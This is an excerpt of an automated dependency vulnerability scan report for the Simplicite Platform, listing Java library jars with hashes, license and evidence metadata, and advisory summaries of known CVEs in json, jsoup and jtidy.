MD5: 6eccf45b3a4bb3dd0518afcf37b8ed35
SHA1: 517d932cc87a3b564f3f7a07ac347b725b619ab4
SHA256: 70db8cf9a1818072f290fd464f14a8369c9c58993e6640128a6e8a6379d67ac7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jmatio High Vendor jar package name jmatio Highest Vendor jar package name jmatio Low Vendor jar package name types Low Vendor pom artifactid jmatio Highest Vendor pom artifactid jmatio Low Vendor pom developer email wgradkowski@gmail.com Low Vendor pom developer id gradusnikov Medium Vendor pom developer name Wojciech Gradkowski Medium Vendor pom developer org URL https://github.com/gradusnikov Medium Vendor pom groupid org.tallison Highest Vendor pom name JMatIO High Vendor pom url tballison/jmatio Highest Product file name jmatio High Product jar package name jmatio Highest Product jar package name types Low Product pom artifactid jmatio Highest Product pom developer email wgradkowski@gmail.com Low Product pom developer id gradusnikov Low Product pom developer name Wojciech Gradkowski Low Product pom developer org URL https://github.com/gradusnikov Low Product pom groupid org.tallison Highest Product pom name JMatIO High Product pom url tballison/jmatio High Version file version 1.5 High Version pom version 1.5 Highest
jmustache-1.15.jarDescription:
A Java implementation of the Mustache templating language. License:
The (New) BSD License: http://www.opensource.org/licenses/bsd-license.php File Path: /var/simplicite/.m2/repository/com/samskivert/jmustache/1.15/jmustache-1.15.jar
MD5: 0b166350b8b372d5caae4f0b692e016f
SHA1: 7b3b15951d13b774c76db2f4e14d977952f8b4d8
SHA256: 1aeb96b9dc17bc29540b8c3342e8e91ee974d5c604165ecd469dd76b041c250c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jmustache High Vendor jar package name mustache Highest Vendor jar package name samskivert Highest Vendor Manifest bundle-activationpolicy lazy Low Vendor Manifest bundle-symbolicname com.samskivert.jmustache Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid jmustache Highest Vendor pom artifactid jmustache Low Vendor pom developer email mdb@samskivert.com Low Vendor pom developer id samskivert Medium Vendor pom developer name Michael Bayne Medium Vendor pom groupid com.samskivert Highest Vendor pom name jmustache High Vendor pom url http://github.com/samskivert/jmustache Highest Product file name jmustache High Product jar package name mustache Highest Product jar package name samskivert Highest Product Manifest bundle-activationpolicy lazy Low Product Manifest Bundle-Name jmustache Medium Product Manifest bundle-symbolicname com.samskivert.jmustache Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid jmustache Highest Product pom developer email mdb@samskivert.com Low Product pom developer id samskivert Low Product pom developer name Michael Bayne Low Product pom groupid com.samskivert Highest Product pom name jmustache High Product pom url http://github.com/samskivert/jmustache Medium Version file version 1.15 High Version pom version 1.15 Highest
jna-5.3.1.jarDescription:
Java Native Access License:
LGPL, version 2.1: http://www.gnu.org/licenses/licenses.html
Apache License v2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/net/java/dev/jna/jna/5.3.1/jna-5.3.1.jar
MD5: df3ad04f50fb50840eeb674210200f64
SHA1: 6eb9d07456c56b9c2560722e90382252f0f98405
SHA256: 01cb505c0698d0f7acf3524c7e73acb7dc424a5bae5e9c86ce44075ab32bc4ee
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jna High Vendor jar package name jna Highest Vendor jar package name native Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest automatic-module-name com.sun.jna Medium Vendor Manifest bundle-activationpolicy lazy Low Vendor Manifest bundle-category jni Low Vendor Manifest bundle-nativecode com/sun/jna/win32-x86/jnidispatch.dll; processor=x86;osname=win32, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-64;osname=win32, com/sun/jna/win32-x86/jnidispatch.dll; processor=x86;osname=win, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-64;osname=win, com/sun/jna/w32ce-arm/jnidispatch.dll; processor=arm;osname=wince, com/sun/jna/sunos-x86/libjnidispatch.so; processor=x86;osname=sunos, com/sun/jna/sunos-x86-64/libjnidispatch.so; processor=x86-64;osname=sunos, com/sun/jna/sunos-sparc/libjnidispatch.so; processor=sparc;osname=sunos, com/sun/jna/sunos-sparcv9/libjnidispatch.so; processor=sparcv9;osname=sunos, com/sun/jna/aix-ppc/libjnidispatch.a; processor=ppc;osname=aix, com/sun/jna/aix-ppc64/libjnidispatch.a; processor=ppc64;osname=aix, com/sun/jna/linux-ppc/libjnidispatch.so; processor=ppc;osname=linux, com/sun/jna/linux-ppc64/libjnidispatch.so; processor=ppc64;osname=linux, com/sun/jna/linux-ppc64le/libjnidispatch.so; processor=ppc64le;osname=linux, com/sun/jna/linux-x86/libjnidispatch.so; processor=x86;osname=linux, com/sun/jna/linux-x86-64/libjnidispatch.so; processor=x86-64;osname=linux, com/sun/jna/linux-arm/libjnidispatch.so; processor=arm;osname=linux, com/sun/jna/linux-armel/libjnidispatch.so; processor=armel;osname=linux, com/sun/jna/linux-aarch64/libjnidispatch.so; processor=aarch64;osname=linux, com/sun/jna/linux-ia64/libjnidispatch.so; processor=ia64;osname=linux, com/sun/jna/linux-sparcv9/libjnidispatch.so; processor=sparcv9;osname=linux, com/sun/jna/linux-mips64el/libjnidispatch.so; processor=mips64el;osname=linux, com/sun/jna/linux-s390x/libjnidispatch.so; processor=S390x;osname=linux, com/sun/jna/freebsd-x86/libjnidispatch.so; processor=x86;osname=freebsd, com/sun/jna/freebsd-x86-64/libjnidispatch.so; processor=x86-64;osname=freebsd, com/sun/jna/openbsd-x86/libjnidispatch.so; processor=x86;osname=openbsd, com/sun/jna/openbsd-x86-64/libjnidispatch.so; processor=x86-64;osname=openbsd, com/sun/jna/darwin/libjnidispatch.jnilib; osname=macosx;processor=x86;processor=x86-64;processor=ppc Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Vendor Manifest bundle-symbolicname com.sun.jna Medium Vendor Manifest Implementation-Vendor JNA Development Team High Vendor Manifest specification-vendor JNA Development Team Low Vendor pom artifactid jna Highest Vendor pom artifactid jna Low Vendor pom developer email mblaesing@doppel-helix.eu Low Vendor pom developer id twall Medium Vendor pom developer name Matthias Bläsing Medium Vendor pom developer name Timothy Wall Medium Vendor pom groupid net.java.dev.jna Highest Vendor pom name Java Native Access High Vendor pom url java-native-access/jna Highest Product file name jna High Product jar package name jna Highest Product jar package name library Highest Product jar package name native Highest Product jar package name sun Highest Product jar package name win32 Highest Product Manifest automatic-module-name com.sun.jna Medium Product Manifest bundle-activationpolicy lazy Low Product Manifest bundle-category jni Low Product Manifest Bundle-Name jna Medium Product Manifest bundle-nativecode com/sun/jna/win32-x86/jnidispatch.dll; processor=x86;osname=win32, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-64;osname=win32, com/sun/jna/win32-x86/jnidispatch.dll; processor=x86;osname=win, com/sun/jna/win32-x86-64/jnidispatch.dll; processor=x86-64;osname=win, com/sun/jna/w32ce-arm/jnidispatch.dll; processor=arm;osname=wince, com/sun/jna/sunos-x86/libjnidispatch.so; processor=x86;osname=sunos, com/sun/jna/sunos-x86-64/libjnidispatch.so; processor=x86-64;osname=sunos, com/sun/jna/sunos-sparc/libjnidispatch.so; processor=sparc;osname=sunos, com/sun/jna/sunos-sparcv9/libjnidispatch.so; processor=sparcv9;osname=sunos, com/sun/jna/aix-ppc/libjnidispatch.a; processor=ppc;osname=aix, com/sun/jna/aix-ppc64/libjnidispatch.a; processor=ppc64;osname=aix, com/sun/jna/linux-ppc/libjnidispatch.so; processor=ppc;osname=linux, com/sun/jna/linux-ppc64/libjnidispatch.so; processor=ppc64;osname=linux, com/sun/jna/linux-ppc64le/libjnidispatch.so; processor=ppc64le;osname=linux, com/sun/jna/linux-x86/libjnidispatch.so; processor=x86;osname=linux, com/sun/jna/linux-x86-64/libjnidispatch.so; processor=x86-64;osname=linux, com/sun/jna/linux-arm/libjnidispatch.so; processor=arm;osname=linux, com/sun/jna/linux-armel/libjnidispatch.so; processor=armel;osname=linux, com/sun/jna/linux-aarch64/libjnidispatch.so; processor=aarch64;osname=linux, com/sun/jna/linux-ia64/libjnidispatch.so; processor=ia64;osname=linux, com/sun/jna/linux-sparcv9/libjnidispatch.so; processor=sparcv9;osname=linux, com/sun/jna/linux-mips64el/libjnidispatch.so; processor=mips64el;osname=linux, com/sun/jna/linux-s390x/libjnidispatch.so; processor=S390x;osname=linux, com/sun/jna/freebsd-x86/libjnidispatch.so; processor=x86;osname=freebsd, com/sun/jna/freebsd-x86-64/libjnidispatch.so; processor=x86-64;osname=freebsd, com/sun/jna/openbsd-x86/libjnidispatch.so; processor=x86;osname=openbsd, com/sun/jna/openbsd-x86-64/libjnidispatch.so; processor=x86-64;osname=openbsd, com/sun/jna/darwin/libjnidispatch.jnilib; osname=macosx;processor=x86;processor=x86-64;processor=ppc Low Product Manifest bundle-requiredexecutionenvironment JavaSE-1.6 Low Product Manifest bundle-symbolicname com.sun.jna Medium Product Manifest Implementation-Title com.sun.jna High Product Manifest specification-title Java Native Access (JNA) Medium Product pom artifactid jna Highest Product pom developer email mblaesing@doppel-helix.eu Low Product pom developer id twall Low Product pom developer name Matthias Bläsing Low Product pom developer name Timothy Wall Low Product pom groupid net.java.dev.jna Highest Product pom name Java Native Access High Product pom url java-native-access/jna High Version file version 5.3.1 High Version Manifest Bundle-Version 5.3.1 High Version pom version 5.3.1 Highest
jna-5.3.1.jar: jnidispatch.dllFile Path: /var/simplicite/.m2/repository/net/java/dev/jna/jna/5.3.1/jna-5.3.1.jar/com/sun/jna/win32-x86-64/jnidispatch.dllMD5: 3c016613eb59259f94e2add2b8d926c0SHA1: e26183f9919ed1daf5c1856c16f8a074bd9ef6dcSHA256: df09119557efe5a5fc2237996b09c3da34fb60eb3ff0c6a5b2a35ec4212e0119Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jnidispatch High Product file name jnidispatch High
jna-5.3.1.jar: jnidispatch.dllFile Path: /var/simplicite/.m2/repository/net/java/dev/jna/jna/5.3.1/jna-5.3.1.jar/com/sun/jna/win32-x86/jnidispatch.dllMD5: 391d7cbfc2c03d0be890541004e6a0acSHA1: 1a48c577532b6dbec44b5401fa8268a86daa35b0SHA256: 2d0342e81527fc07255f6585e7de2e89dcd33b2ccf3e770eb83889353265cec3Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jnidispatch High Product file name jnidispatch High
joda-time-2.10.3.jarDescription:
Date and time library to replace JDK date handling License:
Apache License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/joda-time/joda-time/2.10.3/joda-time-2.10.3.jar
MD5: c7d774a821ec6b1a923d82563d657e2b
SHA1: 2e5366cf1f77ca3bafffecf6e87d30e1d504e959
SHA256: ebb6a6aade36fba2e5aa3f2b98ff9904f20f6f59db1ec6513be5e97d0c578e89
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name joda-time High Vendor jar package name joda Highest Vendor jar package name time Highest Vendor Manifest automatic-module-name org.joda.time Medium Vendor Manifest bundle-docurl https://www.joda.org/joda-time/ Low Vendor Manifest bundle-symbolicname joda-time Medium Vendor Manifest extension-name joda-time Medium Vendor Manifest implementation-url https://www.joda.org/joda-time/ Low Vendor Manifest Implementation-Vendor Joda.org High Vendor Manifest Implementation-Vendor-Id org.joda Medium Vendor Manifest specification-vendor Joda.org Low Vendor pom artifactid joda-time Highest Vendor pom artifactid joda-time Low Vendor pom developer id broneill Medium Vendor pom developer id jodastephen Medium Vendor pom developer name Brian S O'Neill Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid joda-time Highest Vendor pom name Joda-Time High Vendor pom organization name Joda.org High Vendor pom organization url https://www.joda.org Medium Vendor pom url https://www.joda.org/joda-time/ Highest Product file name joda-time High Product jar package name joda Highest Product jar package name time Highest Product Manifest automatic-module-name org.joda.time Medium Product Manifest bundle-docurl https://www.joda.org/joda-time/ Low Product Manifest Bundle-Name Joda-Time Medium Product Manifest bundle-symbolicname joda-time Medium Product Manifest extension-name joda-time Medium Product Manifest Implementation-Title org.joda.time High Product Manifest implementation-url https://www.joda.org/joda-time/ Low Product Manifest specification-title Joda-Time Medium Product pom artifactid joda-time Highest Product pom developer id broneill Low Product pom developer id jodastephen Low Product pom developer name Brian S O'Neill Low Product pom developer name Stephen Colebourne Low Product pom groupid joda-time Highest Product pom name Joda-Time High Product pom organization name Joda.org Low Product pom organization url https://www.joda.org Low Product pom url https://www.joda.org/joda-time/ Medium Version file version 2.10.3 High Version Manifest Bundle-Version 2.10.3 High Version Manifest Implementation-Version 2.10.3 High Version pom version 2.10.3 Highest
jsch-0.1.55.jarDescription:
JSch is a pure Java implementation of SSH2 License:
Revised BSD: http://www.jcraft.com/jsch/LICENSE.txt File Path: /var/simplicite/.m2/repository/com/jcraft/jsch/0.1.55/jsch-0.1.55.jar
MD5: c395ada0fc012d66f11bd30246f6c84d
SHA1: bbd40e5aa7aa3cfad5db34965456cee738a42a50
SHA256: d492b15a6d2ea3f1cc39c422c953c40c12289073dbe8360d98c0f6f9ec74fc44
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jsch High Vendor jar package name jcraft Highest Vendor jar package name jcraft Low Vendor jar package name jsch Highest Vendor jar package name jsch Low Vendor pom artifactid jsch Highest Vendor pom artifactid jsch Low Vendor pom developer email ymnk at jcraft D0t com Low Vendor pom developer id ymnk Medium Vendor pom developer name Atsuhiko Yamanaka Medium Vendor pom developer org JCraft,Inc. Medium Vendor pom developer org URL http://www.jcraft.com/ Medium Vendor pom groupid com.jcraft Highest Vendor pom name JSch High Vendor pom organization name JCraft,Inc. High Vendor pom organization url http://www.jcraft.com/ Medium Vendor pom url http://www.jcraft.com/jsch/ Highest Product file name jsch High Product jar package name jcraft Highest Product jar package name jsch Highest Product jar package name jsch Low Product pom artifactid jsch Highest Product pom developer email ymnk at jcraft D0t com Low Product pom developer id ymnk Low Product pom developer name Atsuhiko Yamanaka Low Product pom developer org JCraft,Inc. Low Product pom developer org URL http://www.jcraft.com/ Low Product pom groupid com.jcraft Highest Product pom name JSch High Product pom organization name JCraft,Inc. Low Product pom organization url http://www.jcraft.com/ Low Product pom url http://www.jcraft.com/jsch/ Medium Version file version 0.1.55 High Version pom version 0.1.55 Highest
json-20190722.jarDescription:
JSON is a light-weight, language independent, data interchange format.
See http://www.JSON.org/
The files in this package implement JSON encoders/decoders in Java.
It also includes the capability to convert between JSON and XML, HTTP
headers, Cookies, and CDL.
This is a reference implementation. There is a large number of JSON packages
in Java. Perhaps someday the Java community will standardize on one. Until
then, choose carefully.
The license includes this restriction: "The software shall be used for good,
not evil." If your conscience cannot live with that, then choose a different
package.
License:
The JSON License: http://json.org/license.html File Path: /var/simplicite/.m2/repository/org/json/json/20190722/json-20190722.jar
MD5: cdb0aa1fd126bc94b34da5856b57f13a
SHA1: 07bce7bacf0ab5e9f894d307a3de8b7f540064d5
SHA256: e35b3830de02a8992ca8beb6936f52ee80e509753d64469c8f0dde93e17a880b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name json-20190722 High Vendor jar package name cdl Highest Vendor jar package name http Highest Vendor jar package name json Highest Vendor jar package name xml Highest Vendor Manifest automatic-module-name org.json Medium Vendor Manifest bundle-symbolicname json Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid json Highest Vendor pom artifactid json Low Vendor pom developer email douglas@crockford.com Low Vendor pom developer name Douglas Crockford Medium Vendor pom groupid org.json Highest Vendor pom name JSON in Java High Vendor pom url douglascrockford/JSON-java Highest Product file name json-20190722 High Product jar package name cdl Highest Product jar package name http Highest Product jar package name json Highest Product jar package name xml Highest Product Manifest automatic-module-name org.json Medium Product Manifest Bundle-Name JSON in Java Medium Product Manifest bundle-symbolicname json Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid json Highest Product pom developer email douglas@crockford.com Low Product pom developer name Douglas Crockford Low Product pom groupid org.json Highest Product pom name JSON in Java High Product pom url douglascrockford/JSON-java High Version file version 20190722 Medium Version pom version 20190722 Highest
CVE-2022-45688 suppress
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2023-5072 suppress
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
json-simple-1.1.1.jarDescription:
A simple Java toolkit for JSON License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/googlecode/json-simple/json-simple/1.1.1/json-simple-1.1.1.jar
MD5: 5cc2c478d73e8454b4c369cee66c5bc7
SHA1: c9ad4a0850ab676c5c64461a05ca524cdfff59f1
SHA256: 4e69696892b88b41c55d49ab2fdcc21eead92bf54acc588c0050596c3b75199c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name json-simple High Vendor jar package name json Highest Vendor jar package name simple Highest Vendor Manifest bundle-symbolicname com.googlecode.json-simple Medium Vendor pom artifactid json-simple Highest Vendor pom artifactid json-simple Low Vendor pom developer id Yidong Medium Vendor pom developer name Yidong Fang Medium Vendor pom groupid com.googlecode.json-simple Highest Vendor pom name JSON.simple High Vendor pom url http://code.google.com/p/json-simple/ Highest Product file name json-simple High Product jar package name json Highest Product jar package name simple Highest Product Manifest Bundle-Name JSON.simple Medium Product Manifest bundle-symbolicname com.googlecode.json-simple Medium Product pom artifactid json-simple Highest Product pom developer id Yidong Low Product pom developer name Yidong Fang Low Product pom groupid com.googlecode.json-simple Highest Product pom name JSON.simple High Product pom url http://code.google.com/p/json-simple/ Medium Version file version 1.1.1 High Version Manifest Bundle-Version 1.1.1 High Version pom version 1.1.1 Highest
jsoup-1.12.1.jarDescription:
jsoup is a Java library for working with real-world HTML. It provides a very convenient API for extracting and manipulating data, using the best of DOM, CSS, and jquery-like methods. jsoup implements the WHATWG HTML5 specification, and parses HTML to the same DOM as modern browsers do. License:
The MIT License: https://jsoup.org/license File Path: /var/simplicite/.m2/repository/org/jsoup/jsoup/1.12.1/jsoup-1.12.1.jar
MD5: 79bb9e9e8b50ef80a18bd46426befc5a
SHA1: 55819a28fc834c2f2bcf4dcdb278524dc3cf088f
SHA256: 4f961f68e47740dd7576c9685774a7b25b92f1017af24e2f707b30e893abade3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jsoup High Vendor jar package name jsoup Highest Vendor jar package name parser Highest Vendor Manifest automatic-module-name org.jsoup Medium Vendor Manifest bundle-docurl https://jsoup.org/ Low Vendor Manifest bundle-symbolicname org.jsoup Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid jsoup Highest Vendor pom artifactid jsoup Low Vendor pom developer email jonathan@hedley.net Low Vendor pom developer id jhy Medium Vendor pom developer name Jonathan Hedley Medium Vendor pom groupid org.jsoup Highest Vendor pom name jsoup Java HTML Parser High Vendor pom organization name Jonathan Hedley High Vendor pom organization url https://jhy.io/ Medium Vendor pom url https://jsoup.org/ Highest Product file name jsoup High Product jar package name jsoup Highest Product jar package name parser Highest Product Manifest automatic-module-name org.jsoup Medium Product Manifest bundle-docurl https://jsoup.org/ Low Product Manifest Bundle-Name jsoup Java HTML Parser Medium Product Manifest bundle-symbolicname org.jsoup Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid jsoup Highest Product pom developer email jonathan@hedley.net Low Product pom developer id jhy Low Product pom developer name Jonathan Hedley Low Product pom groupid org.jsoup Highest Product pom name jsoup Java HTML Parser High Product pom organization name Jonathan Hedley Low Product pom organization url https://jhy.io/ Low Product pom url https://jsoup.org/ Medium Version file version 1.12.1 High Version Manifest Bundle-Version 1.12.1 High Version pom version 1.12.1 Highest
CVE-2021-37714 suppress
jsoup is a Java library for working with HTML. Those using jsoup versions prior to 1.14.2 to parse untrusted HTML or XML may be vulnerable to DOS attacks. If the parser is run on user supplied input, an attacker may supply content that causes the parser to get stuck (loop indefinitely until cancelled), to complete more slowly than usual, or to throw an unexpected exception. This effect may support a denial of service attack. The issue is patched in version 1.14.2. There are a few available workarounds. Users may rate limit input parsing, limit the size of inputs based on system resources, and/or implement thread watchdogs to cap and timeout parse runtimes. CWE-248 Uncaught Exception, CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2022-36033 suppress
jsoup is a Java HTML parser, built for HTML editing, cleaning, scraping, and cross-site scripting (XSS) safety. jsoup may incorrectly sanitize HTML including `javascript:` URL expressions, which could allow XSS attacks when a reader subsequently clicks that link. If the non-default `SafeList.preserveRelativeLinks` option is enabled, HTML including `javascript:` URLs that have been crafted with control characters will not be sanitized. If the site that this HTML is published on does not set a Content Security Policy, an XSS attack is then possible. This issue is patched in jsoup 1.15.3. Users should upgrade to this version. Additionally, as the unsanitized input may have been persisted, old content should be cleaned again using the updated version. To remediate this issue without immediately upgrading: - disable `SafeList.preserveRelativeLinks`, which will rewrite input URLs as absolute URLs - ensure an appropriate [Content Security Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) is defined. (This should be used regardless of upgrading, as a defence-in-depth best practice.) CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions: (show all )
jsr305-3.0.2.jarDescription:
JSR305 Annotations for Findbugs License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/google/code/findbugs/jsr305/3.0.2/jsr305-3.0.2.jar
MD5: dd83accb899363c32b07d7a1b2e4ce40
SHA1: 25ea2e8b0c338a877313bd4672d3fe056ea78f0d
SHA256: 766ad2a0783f2687962c8ad74ceecc38a28b9f72a2d085ee438b7813e928d0c7
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jsr305 High Vendor Manifest bundle-symbolicname org.jsr-305 Medium Vendor pom artifactid jsr305 Highest Vendor pom artifactid jsr305 Low Vendor pom groupid com.google.code.findbugs Highest Vendor pom name FindBugs-jsr305 High Vendor pom url http://findbugs.sourceforge.net/ Highest Product file name jsr305 High Product Manifest Bundle-Name FindBugs-jsr305 Medium Product Manifest bundle-symbolicname org.jsr-305 Medium Product pom artifactid jsr305 Highest Product pom groupid com.google.code.findbugs Highest Product pom name FindBugs-jsr305 High Product pom url http://findbugs.sourceforge.net/ Medium Version file version 3.0.2 High Version Manifest Bundle-Version 3.0.2 High Version pom version 3.0.2 Highest
jsr311-api-1.1.1.jarLicense:
CDDL License
: http://www.opensource.org/licenses/cddl1.php File Path: /var/simplicite/.m2/repository/javax/ws/rs/jsr311-api/1.1.1/jsr311-api-1.1.1.jar
MD5: c9803468299ec255c047a280ddec510f
SHA1: 59033da2a1afd56af1ac576750a8d0b1830d59e6
SHA256: ab1534b73b5fa055808e6598a5e73b599ccda28c3159c3c0908977809422ee4a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jsr311-api High Vendor hint analyzer vendor web services Medium Vendor jar package name javax Highest Vendor jar package name rs Highest Vendor jar package name ws Highest Vendor Manifest bundle-docurl http://www.sun.com/ Low Vendor Manifest bundle-symbolicname javax.ws.rs.jsr311-api Medium Vendor Manifest extension-name javax.ws.rs Medium Vendor Manifest specification-vendor Sun Microsystems, Inc. Low Vendor pom artifactid jsr311-api Highest Vendor pom artifactid jsr311-api Low Vendor pom groupid javax.ws.rs Highest Vendor pom name jsr311-api High Vendor pom organization name Sun Microsystems, Inc High Vendor pom organization url http://www.sun.com/ Medium Vendor pom url https://jsr311.dev.java.net Highest Product file name jsr311-api High Product hint analyzer product web services Medium Product jar package name javax Highest Product jar package name rs Highest Product jar package name ws Highest Product Manifest bundle-docurl http://www.sun.com/ Low Product Manifest Bundle-Name jsr311-api Medium Product Manifest bundle-symbolicname javax.ws.rs.jsr311-api Medium Product Manifest extension-name javax.ws.rs Medium Product Manifest specification-title JAX-RS: Java API for RESTful Web Services Medium Product pom artifactid jsr311-api Highest Product pom groupid javax.ws.rs Highest Product pom name jsr311-api High Product pom organization name Sun Microsystems, Inc Low Product pom organization url http://www.sun.com/ Low Product pom url https://jsr311.dev.java.net Medium Version file version 1.1.1 High Version Manifest Bundle-Version 1.1.1 High Version Manifest specification-version 1.1.1 High Version pom version 1.1.1 Highest
jtidy-r938.jarDescription:
JTidy is a Java port of HTML Tidy, a HTML syntax checker and pretty printer. Like its non-Java cousin, JTidy can be
used as a tool for cleaning up malformed and faulty HTML. In addition, JTidy provides a DOM interface to the
document that is being processed, which effectively makes you able to use JTidy as a DOM parser for real-world HTML.
License:
Java HTML Tidy License: http://jtidy.svn.sourceforge.net/viewvc/jtidy/trunk/jtidy/LICENSE.txt?revision=95 File Path: /var/simplicite/.m2/repository/net/sf/jtidy/jtidy/r938/jtidy-r938.jar
MD5: 6a9121561b8f98c0a8fb9b6e57f50e6b
SHA1: ab08d87a225a715a69107732b67f21e1da930349
SHA256: 6fc03e51e73fa884f06e7eae0761e045e56fdeb4e146a4d952e3023cc9e3fb43
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jtidy-r938 High Vendor jar package name parser Highest Vendor jar package name tidy Low Vendor jar package name w3c Low Vendor pom artifactid jtidy Highest Vendor pom artifactid jtidy Low Vendor pom developer email atripp AT users.sourceforge.net Low Vendor pom developer email fgiust AT users.sourceforge.net Low Vendor pom developer email garypeskin AT users.sourceforge.net Low Vendor pom developer email lempinen AT users.sourceforge.net Low Vendor pom developer email russgold AT users.sourceforge.net Low Vendor pom developer id atripp Medium Vendor pom developer id fgiust Medium Vendor pom developer id garypeskin Medium Vendor pom developer id lempinen Medium Vendor pom developer id russgold Medium Vendor pom developer name Andy Tripp Medium Vendor pom developer name Fabrizio Giustina Medium Vendor pom developer name Gary L Peskin Medium Vendor pom developer name Russell Gold Medium Vendor pom developer name Sami Lempinen Medium Vendor pom developer org Sourceforge Medium Vendor pom groupid net.sf.jtidy Highest Vendor pom name JTidy High Vendor pom organization name sourceforge High Vendor pom organization url http://sourceforge.net Medium Vendor pom url http://jtidy.sourceforge.net Highest Product file name jtidy-r938 High Product jar package name parser Highest Product jar package name tidy Low Product pom artifactid jtidy Highest Product pom developer email atripp AT users.sourceforge.net Low Product pom developer email fgiust AT users.sourceforge.net Low Product pom developer email garypeskin AT users.sourceforge.net Low Product pom developer email lempinen AT users.sourceforge.net Low Product pom developer email russgold AT users.sourceforge.net Low Product pom developer id atripp Low Product pom developer id fgiust Low Product pom developer id garypeskin Low Product pom developer id lempinen Low Product pom developer id russgold Low Product pom developer name Andy Tripp Low Product pom developer name Fabrizio Giustina Low Product pom developer name Gary L Peskin Low Product pom developer name Russell Gold Low Product pom developer name Sami Lempinen Low Product pom developer org Sourceforge Low Product pom groupid net.sf.jtidy Highest Product pom name JTidy High Product pom organization name sourceforge Low Product pom organization url http://sourceforge.net Low Product pom url http://jtidy.sourceforge.net Medium Version pom version r938 Highest
CVE-2023-34623 suppress
An issue was discovered jtidy thru r938 allows attackers to cause a denial of service or other unspecified impacts via crafted object that uses cyclic dependencies. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
jul-to-slf4j-1.7.30.jarDescription:
JUL to SLF4J bridge File Path: /var/simplicite/.m2/repository/org/slf4j/jul-to-slf4j/1.7.30/jul-to-slf4j-1.7.30.jarMD5: f2c78cb93d70dc5dea0c50f36ace09c1SHA1: d58bebff8cbf70ff52b59208586095f467656c30SHA256: bbcbfdaa72572255c4f85207a9bfdb24358dc993e41252331bd4d0913e4988b9Referenced In Project/Scope: Simplicite Platform:compile
